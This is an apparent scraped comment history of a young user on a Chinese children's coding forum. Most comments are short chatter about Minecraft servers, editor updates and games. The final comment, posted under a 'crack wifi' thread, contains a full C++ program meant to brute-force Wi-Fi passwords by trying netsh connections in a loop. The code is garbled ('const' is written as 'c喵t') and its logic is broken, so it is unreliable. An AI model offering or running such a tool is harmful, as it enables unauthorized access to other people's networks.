猫史档案馆


内向的流星猫0AL7

内向的流星猫0AL7

Lv.1

2首了

获赞:1072收藏:994浏览:79903作品收藏:445

签名:已回归 师傅:深圳激活码,师兄:厉害少年,无徒弟,招徒弟 不会画画,会一些小技术 已退(勿扰) 升大佬 点赞目标:80/400 收藏目标:200/500 被创目标:500/500 https://shimo.im/forms/gVcgVC9gPdHkYj3w/fill https://shequ.codemao.cn/community/1637116打过呼啸了 暂退,学c++中

回复帖子评论
上一页1 页 / 共 2下一页

史上最难选择题,有大约80%的人回答错误 中回复

豆腐都是一块一块的,你见过一块变两块吗?

2023-02-03T16:34:20 点赞:0

求助大佬啊!! 中回复

很简单

2023-02-25T05:57:54 点赞:0

有人教教我吗😭😭(代码) 中回复

https://www.huweibc.com/submitCourse/viewGocShow/10405

 

2023-05-13T21:24:39 点赞:0

有人教教我吗😭😭(代码) 中回复

 

huweibc.com/submitCourse/viewGocShow/10405

2023-05-13T21:24:58 点赞:0

【新一代编辑器上线预告】手机电脑都能用的Kitten N要来啦! 中回复

无法使用函数(平板)

2023-07-12T08:56:04 点赞:0

你永远都不无法知道对面在拿什么和聊天 中回复

啊啊啊

2024-06-16T13:49:41 点赞:1

你永远都不无法知道对面在拿什么和聊天 中回复

center_image

2024-06-21T21:30:55 点赞:0

你永远都不无法知道对面在拿什么和聊天 中回复

center_image

2024-06-21T21:31:34 点赞:0

你永远都不无法知道对面在拿什么和聊天 中回复

center_image肯jj

2024-06-21T21:47:17 点赞:0

你永远都不无法知道对面在拿什么和聊天 中回复

center_image

2024-07-13T09:53:41 点赞:0

你看了你就知道了 中回复

呵呵

2024-07-27T18:49:23 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

  center_image

2024-08-11T17:54:56 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

center_image

2024-08-11T17:55:53 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

刷怪塔刷出的神奇装备

2024-08-11T17:56:19 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

我加了你的服务器

2024-08-11T17:58:14 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

为什么进不了

2024-08-11T18:00:57 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

需要正版吗

2024-08-11T19:09:40 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

进不去

2024-08-11T20:07:28 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

center_image

2024-08-11T20:08:35 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

center_image

2024-08-11T20:22:45 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

mc.js.cool网页版

2024-08-13T19:17:47 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

@腐竹,服务器蹦了center_image

2024-08-13T19:22:25 点赞:0

我的世界 基岩JAVA互通服务器1.21 中回复

开服啊

2024-08-15T19:32:28 点赞:0

【Kitten N公测更新】大家期待的AI对话来啦~ 中回复

能不能加一个kitten4转kittenN的转换器

2024-10-18T20:22:26 点赞:1

【Kitten N公测更新】大家期待的AI对话来啦~ 中回复

能不能加一个kitten4转kittenN的转换器

2024-10-20T19:39:52 点赞:1

【小游戏】把你的头像发出来并形容 中回复

shi

2024-10-31T20:07:22 点赞:1

我的世界 基岩JAVA互通服务器1.21 中回复

还开不开服,我等了3个月啦

2024-11-16T11:03:17 点赞:0

【小游戏】把你的头像发出来并形容 中回复

我的狗

2025-02-10T14:21:52 点赞:2

我四年级了好吧 中回复

v姐↑姐↓~~

2025-02-10T14:34:53 点赞:1

【Python作品分享】破解wifi 中回复

大佬我有一个c++的喵破解WiFi密码

#include <iostream>
#include <cstdlib>
#include <string>
#include <cstdio>

// 获取用户文档目录
std::string getDocumentsDirectory() {
    c喵t char* userProfile = std::getenv("USERPROFILE");
    if (userProfile != NULL) {
        std::string profilePath(userProfile);
        return profilePath + "\\Documents";
    }
    return "";
}

// 连接到指定的 Wi-Fi 网络
bool connectToWiFi(c喵t std::string& ssid, c喵t std::string& password) {
    std::string command = "netsh wlan connect name=\"" + ssid + "\" ssid=\"" + ssid + "\" interface=WLAN";
    int result = std::system(command.c_str());
    if (result != 0) {
        return false;
    }

    std::string profileCommand = "netsh wlan add profile filename=\"";
    std::string profileContent = "<?xml version=\"1.0\"?>\n"
                                 "<WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\">\n"
                                 "    <name>" + ssid + "</name>\n"
                                 "    <SSIDConfig>\n"
                                 "        <SSID>\n"
                                 "            <name>" + ssid + "</name>\n"
                                 "        </SSID>\n"
                                 "    </SSIDConfig>\n"
                                 "    <connectionType>ESS</connectionType>\n"
                                 "    <connectionMode>auto</connectionMode>\n"
                                 "    <MSM>\n"
                                 "        <security>\n"
                                 "            <authEncryption>\n"
                                 "                <authentication>WPA2PSK</authentication>\n"
                                 "                <encryption>AES</encryption>\n"
                                 "                <useOneX>false</useOneX>\n"
                                 "            </authEncryption>\n"
                                 "            <sharedKey>\n"
                                 "                <keyType>passPhrase</keyType>\n"
                                 "                <protected>false</protected>\n"
                                 "                <keyMaterial>" + password + "</keyMaterial>\n"
                                 "            </sharedKey>\n"
                                 "        </security>\n"
                                 "    </MSM>\n"
                                 "</WLANProfile>";

    std::string documentsDir = getDocumentsDirectory();
    std::string tempFile = documentsDir + "\\wifi_profile.xml";

    FILE* file = std::fopen(tempFile.c_str(), "w");
    if (file != NULL) {
        std::fprintf(file, "%s", profileContent.c_str());
        std::fclose(file);
    } else {
        return false;
    }

    profileCommand += tempFile + "\" interface=WLAN";
    result = std::system(profileCommand.c_str());
    if (result != 0) {
        return false;
    }

    return true;
}

// 生成下一个可能的密码组合
bool nextPassword(std::string& password, c喵t std::string& charset) {
    int len = password.length();
    for (int i = len - 1; i >= 0; --i) {
        size_t pos = charset.find(password[i]);
        if (pos < charset.length() - 1) {
            password[i] = charset[pos + 1];
            return true;
        } else {
            password[i] = charset[0];
        }
    }
    return false;
}

// 喵破解 Wi-Fi 密码
std::string bruteForceWiFiPassword(c喵t std::string& ssid, int maxLength) {
    std::string charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_";
    for (int length = 8; length <= maxLength; ++length) {
        std::string currentPassword(length, charset[0]);
        do {
            // 显示当前正在尝试的密码
            std::cout << "正在尝试密码: " << currentPassword << std::endl;
            if (connectToWiFi(ssid, currentPassword)) {
                return currentPassword;
            }
        } while (nextPassword(currentPassword, charset));
    }
    return "";
}

int main() {
    std::cout << "请输入你要连接的网络: " << std::endl;
    std::string ssid;
    std::cin >> ssid;

    std::string crackedPassword = bruteForceWiFiPassword(ssid, 128);
    if (!crackedPassword.empty()) {
        std::cout << "密码已破解: " << crackedPassword << std::endl;
    } else {
        std::cout << "未找到密码。" << std::endl;
    }

    return 0;
}	、、 

2025-02-10T14:56:59 点赞:0